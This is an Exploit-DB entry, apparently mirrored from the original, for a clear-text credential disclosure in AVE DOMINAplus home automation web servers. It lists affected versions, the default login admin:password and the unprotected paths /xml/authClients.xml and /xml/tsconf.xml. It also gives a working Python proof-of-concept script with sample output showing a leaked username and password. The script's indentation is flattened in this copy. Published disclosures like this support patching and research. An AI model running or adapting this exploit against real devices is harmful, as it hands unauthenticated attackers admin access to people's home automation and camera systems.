AVE DOMINAplus 1.10.x – Credential Disclosure

  • 作者: LiquidWorm
    日期: 2019-12-30
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/47819/
  • # Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure
    # Date: 2019-12-30
    # Author: LiquidWorm
    # Vendor: AVE S.p.A.
    # Product web page: https://www.ave.it | https://www.domoticaplus.it
    # Affected version: Web Server Code 53AB-WBS - 1.10.62
    # Advisory ID: ZSL-2019-5550
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php
    #!/usr/bin/env python
    # AVE DOMINAplus <=1.10.x Credentials Disclosure Exploit
    # Vendor: AVE S.p.A.
    # Product web page: https://www.ave.it | https://www.domoticaplus.it
    # Affected version: Web Server Code 53AB-WBS - 1.10.62
    # Touch Screen Code TS01 - 1.0.65
    # Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
    # Touch Screen Code TS05 - 1.10.36
    # Models: 53AB-WBS
    # TS01
    # TS03V
    # TS04X-V
    # TS05N-V
    # App version: 1.10.77
    # App version: 1.10.65
    # App version: 1.10.64
    # App version: 1.10.62
    # App version: 1.10.60
    # App version: 1.10.52
    # App version: 1.10.52A
    # App version: 1.10.49
    # App version: 1.10.46
    # App version: 1.10.45
    # App version: 1.10.44
    # App version: 1.10.35
    # App version: 1.10.25
    # App version: 1.10.22
    # App version: 1.10.11
    # App version: 1.8.4
    # App version: TS1-1.0.65
    # App version: TS1-1.0.62
    # App version: TS1-1.0.44
    # App version: TS1-1.0.10
    # App version: TS1-1.0.9
    # Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
    # Designed to revolutionize your concept of living. DOMINA plus is the AVE home
    # automation proposal that makes houses safer, more welcoming and optimized. In
    # fact, our home automation system introduces cutting-edge technologies, designed
    # to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
    # and security and offers advanced supervision tools in order to learn how to evaluate
    # and reduce consumption through various solutions dedicated to energy saving.
    # Desc: The application suffers from clear-text credentials disclosure vulnerability
    # that allows an unauthenticated attacker to issue a request to an unprotected directory
    # that hosts an XML file '/xml/authClients.xml' and obtain administrative login information
    # that allows for a successful authentication bypass attack.
    # Default credentials: admin:password
    # Configuration and camera credentials disclosure: /xml/tsconf.xml
    # ==================================================
    # root@kali:~/domina# ./poc.py
    # Ze microfilm:
    # -------------
    # Username: arnoldcontrol
    # Password: P1sD0nt5pYMe
    # ==================================================
    # Tested on: GNU/Linux 4.1.19-armv7-x7
    #GNU/Linux 3.8.13-bone50/bone71.1/bone86
    #Apache/2.4.7 (Ubuntu)
    #Apache/2.2.22 (Debian)
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # @zeroscience
    # Advisory ID: ZSL-2019-5550
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php
    # 06.10.2019
    import sys,re
    import xml.etree.ElementTree as XML
    from urllib2 import Request,urlopen
    if (len(sys.argv) <= 1):
    print '[*] Usage: poc.py http://ip:port'
    host = sys.argv[1]
    headers = {'Accept': 'application/xml'}
    request = Request(host+'/xml/authClients.xml', headers=headers)
    print '\nZe microfilm:'
    print '-------------'
    xml = urlopen(request).read()
    tree = XML.fromstring(xml)
    for user in tree.findall('customer'):
    print 'Username: ',user.get('plantCode')
    for pwd in tree.iter('password'):
    print 'Password: '+pwd.text+'\n'